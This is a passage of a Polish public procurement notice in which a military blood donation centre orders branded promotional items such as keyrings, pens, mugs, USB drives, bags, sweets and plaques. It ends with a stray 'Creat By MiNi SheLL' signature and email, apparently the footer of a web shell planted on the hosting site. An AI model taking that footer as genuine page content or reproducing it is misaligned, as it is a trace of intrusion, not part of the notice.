poz. 5. Brelok dla dawców z grupą krwi brelok poliuretanowy z żetonem do wózków na zakupy wymiary żetonu: 2,3 cm, 15mm  na 15mm. Brelok w kolorze czerwonym, awers: na czerwonym tle grupa krwi w kolorze białym, na wierzchu naklejka wypukła: zamieszczona grupa krwi oraz adres strony www.wckik.pl z zawieszką okrągłą na klucze. Nadruk trwały i odporny na ścieranie. Projekt i wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. ARh dodatni 100szt, ARh ujemny 100 szt., ORh dodatni 100 szt., ORh ujemny 100 szt., BRh dodatni 100 szt., BRh ujemny 100szt., Brah dodatni 200szt., Brah ujemny 200szt. Wielkość zamówienia 1000 sztuk;
poz. 6. Długopis dla dawców WCKiK z logo. Długopis automatyczny plastikowy z miękkim uchwytem koloru białego. Napis wykonany w sposób zapewniający trwałość podczas użytkowania: www.wckik.pl. Wkład kolor: niebieski. Projekt graficzny będzie wykonany przez wykonawcę wg wzoru zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia 5000 sztuk;
poz. 7. Kredki dla dzieci Opis produktu: Komplet 12 drewnianych kredek dł 170 mm do 190 mm na 50 mm do 80 mm w kolorowym kartonowym pudełku. Materiał: drewno. Typ znakowani tampodruk, na pudełku centralnie postać krwinki zgodna z załącznikiem Nr 2b, nazwa WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, oraz adres strony internetowej: www.wckik.pl. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  50 sztuk;
poz. 8. Kubek z logo Kubek porcelanowy lub inny materiał mający zbliżone właściwości do porcelany. Wysokość:11 mm, Średnica góra 90 mm, dół 5,9 mm. Dopuszczalne odchylenie od wymiarów 5 mm. Pojemność min. 250 ml. Możliwość zmywania w zmywarce. Wykończenie błysk, kolory kubka: czerwony w środku, biały na zewnątrz: dolna część oraz ucho wygodne do trzymania, w kolorze białym. Na kubku musi być logo i napis: WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, na części dolnej 1,5 cm od dołu kubka napis www.wckik.pl załącznik Nr 14, po przeciwnej części kubka postać krwinki, wg. załącznika Nr 2b. Każdy kubek pakowany osobno w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wytycznych Zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po akceptacji przez Zamawiającego.   Wielkość zamówienia  500 sztuk;
poz. 9. Pendrive Pamięć USB 4 GB, obudowa plastik aluminium, logo na obudowie wg. załącznika Nr 2 znakowanie tampodruk. Każdy pendrive zapakowany osobno w pudełko. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po akceptacji przez Zamawiającego.   Wielkość zamówienia  270 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Reklamówki z logo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Reklamówki z logo - Torba reklamowa typu market kolor folii biały nieprzeźroczysty, wycięty otwór umożliwiający przenoszenie, wzmocniony podklejką, bez zakładki dolnej, logo i napisy WCKiK kolor srebrny, nadruk fleksograficzny. Rozmiar: 35cm na 45cm. Folia LDPE o grubości 55 mikronów, jednolity kolor nadruku. Rozmieszczenie treści nadruku: Środek: Logo WCKiK SPZOZ zgodnie z załącznikiem Nr 2. Poniżej logo WCKiK treść wyśrodkowana: WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ Na samym dole treść: www.wckik.pl. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  6000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Słodycze reklamowe  krówki ciągutki o smaku mlecznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Słodycze reklamowe  krówki ciągutki o smaku mlecznym, zawinięte w podkładkę parafinową oraz etykietę z nadrukiem reklamowym 4 plus 0 zgodnym z załącznikiem Nr 10, waga cukierka ok. 12g. (plus minus 1,5g), format 70 na 21 na 12 mm, ilość sztuk w kilogramie od 75 sztuk do 85 szt. okres przydatności do spożycia od momentu dostawy 6 miesięcy, skład cukier, tłuszcz roślinny, syrop glukozowy, mleko w proszku. Wykonanie produktu nastąpi po zaakceptowaniu przez zamawiającego. Krówki pakowane w opakowanie zbiorcze po 5 kg. Na opakowaniach informacja o składnikach, producencie i terminie przydatności do spożycia. Wykonanie nastąpi po całkowitej akceptacji przez zamawiającego. Wielkość zamówienia 100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryngraf WCKiK + Etui.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> poz. 1. Ryngraf WCKiK Podkład deski wykonany z drewna w kolorze mahoń, struktura gładka, zgodny z załącznikiem Nr 12: Próbki drewna przesłana do akceptacji Zamawiającego. Wymiar plus minus 10%, wys. 17,5 cmx grubość 1,6 cm.. Z tyłu podkładu otwór do mocowania na ścianie. Na podkładzie wykonany z metalu w kształcie wstęgi i przytwierdzony trwale napis WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ zał Nr 12, pod wstęgą centralnie na ryngrafie kolorowe logo zgodne z załącznikiem Nr 2 w proporcjach 1do3 wielkości deski. Każdy ryngraf pakowany w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  30 sztuk;
poz. 2. Etui na ryngraf Wykonanie etui do ryngrafu WCKiK. Wymiary ryngrafu wysokość 17,5 cm, szerokość 14,5 cm. Kształt ryngrafu zgodny z zał. Nr 13. Wierzch etui z tworzywa introligatorskiego narożniki z metalu. W środku materiałowa wyściółka. Kolor etui zostanie wybrany po przedstawieniu przez Wykonawcę 5 wzorów. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Wielkość zamówienia  30 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Balon z logo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Balon z logo. Balon 11 cali (88 cm obwodu) w kolorze białym postacią krwinki zaproponowaną przez Wykonawcę oraz napisem  www.wckik.pl. Wielkość krwinki po nadmuchaniu balonu powinna wynosić min 7cm. Do każdego balonu dodatkowo: patyczek i uchwyt do przyczepienia balonu. Nadruk odporny na ścieranie Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego Załącznik Nr 2b i przedstawiony do akceptacji. Wykonanie nastąpi po akceptacji przez Zamawiającego. Wielkość zamówienia  200 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Stojak na ulotki, wstążka flaga.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> poz. 1. Stojak na ulotki  Podstawa metalowa z drewnianą obudową o 380 mm. Profil aluminiowy wysokości 1000 mm. Z kieszeniami z plexi 3 na A4 z możliwością dzielenia. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  2 sztuki;
poz. 2. Wstążka flaga  wstęga rypsowa w kolorze białoczerwonym wykorzystywana do przecięcia podczas uroczystości otwarcia np. budynku. Szerokość 10cm plus minus 1 cm długość 6 m. Wykonanie nastąpi po akceptacji przez Zamawiającego.  Wielkość zamówienia  9 m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com